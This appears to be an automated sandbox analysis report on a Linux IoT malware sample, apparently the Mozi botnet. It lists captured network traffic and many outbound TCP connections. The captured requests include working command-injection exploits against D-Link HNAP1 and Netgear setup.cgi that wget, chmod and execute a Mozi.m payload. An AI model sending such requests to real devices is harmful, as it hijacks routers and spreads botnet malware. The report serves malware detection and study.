Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.40.37.31:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.137.248.191:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Source: /tmp/MGuvcs6Ocz (PID: 4622)

Socket: 0.0.0.0::44343

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 121.130.248.221
Source: unknown	TCP traffic detected without corresponding DNS query: 71.181.75.105
Source: unknown	TCP traffic detected without corresponding DNS query: 168.27.245.114
Source: unknown	TCP traffic detected without corresponding DNS query: 87.83.202.29
Source: unknown	TCP traffic detected without corresponding DNS query: 137.88.31.213
Source: unknown	TCP traffic detected without corresponding DNS query: 48.145.90.179
Source: unknown	TCP traffic detected without corresponding DNS query: 157.46.152.22
Source: unknown	TCP traffic detected without corresponding DNS query: 219.143.155.172
Source: unknown	TCP traffic detected without corresponding DNS query: 24.81.183.180
Source: unknown	TCP traffic detected without corresponding DNS query: 11.140.34.223
Source: unknown	TCP traffic detected without corresponding DNS query: 71.11.190.90
Source: unknown	TCP traffic detected without corresponding DNS query: 191.250.144.46
Source: unknown	TCP traffic detected without corresponding DNS query: 37.215.228.246
Source: unknown	TCP traffic detected without corresponding DNS query: 205.51.33.91
Source: unknown	TCP traffic detected without corresponding DNS query: 103.102.254.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.136.201.94
Source: unknown	TCP traffic detected without corresponding DNS query: 204.189.67.153
Source: unknown	TCP traffic detected without corresponding DNS query: 164.142.55.184
Source: unknown	TCP traffic detected without corresponding DNS query: 15.51.212.241
Source: unknown	TCP traffic detected without corresponding DNS query: 7.224.163.250
Source: unknown	TCP traffic detected without corresponding DNS query: 118.114.67.42
Source: unknown	TCP traffic detected without corresponding DNS query: 57.163.20.143
Source: unknown	TCP traffic detected without corresponding DNS query: 193.22.15.210
Source: unknown	TCP traffic detected without corresponding DNS query: 94.185.176.145
Source: unknown	TCP traffic detected without corresponding DNS query: 78.27.98.91
Source: unknown	TCP traffic detected without corresponding DNS query: 36.54.249.217
Source: unknown	TCP traffic detected without corresponding DNS query: 160.226.225.149
Source: unknown	TCP traffic detected without corresponding DNS query: 184.235.140.0
Source: unknown	TCP traffic detected without corresponding DNS query: 130.140.7.168
Source: unknown	TCP traffic detected without corresponding DNS query: 131.112.27.0
Source: unknown	TCP traffic detected without corresponding DNS query: 184.49.220.2
Source: unknown	TCP traffic detected without corresponding DNS query: 166.216.172.210
Source: unknown	TCP traffic detected without corresponding DNS query: 98.135.167.186
Source: unknown	TCP traffic detected without corresponding DNS query: 2.99.233.91
Source: unknown	TCP traffic detected without corresponding DNS query: 211.105.77.124
Source: unknown	TCP traffic detected without corresponding DNS query: 103.186.65.125
Source: unknown	TCP traffic detected without corresponding DNS query: 1.172.219.187
Source: unknown	TCP traffic detected without corresponding DNS query: 50.192.24.84
Source: unknown	TCP traffic detected without corresponding DNS query: 58.244.219.70
Source: unknown	TCP traffic detected without corresponding DNS query: 7.177.190.112
Source: unknown	TCP traffic detected without corresponding DNS query: 88.91.75.33
Source: unknown	TCP traffic detected without corresponding DNS query: 163.206.226.193
Source: unknown	TCP traffic detected without corresponding DNS query: 134.67.11.73
Source: unknown	TCP traffic detected without corresponding DNS query: 30.115.123.158
Source: unknown	TCP traffic detected without corresponding DNS query: 12.220.127.50
Source: unknown	TCP traffic detected without corresponding DNS query: 51.78.124.189
Source: unknown	TCP traffic detected without corresponding DNS query: 212.212.35.40
Source: unknown	TCP traffic detected without corresponding DNS query: 32.39.252.126
Source: unknown	TCP traffic detected without corresponding DNS query: 15.178.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 92.69.32.77

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MGuvcs6Ocz

Overview

General Information

Detection

Signatures

Classification

Startup

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Signature Overview

AV Detection:

Spreading:

Networking: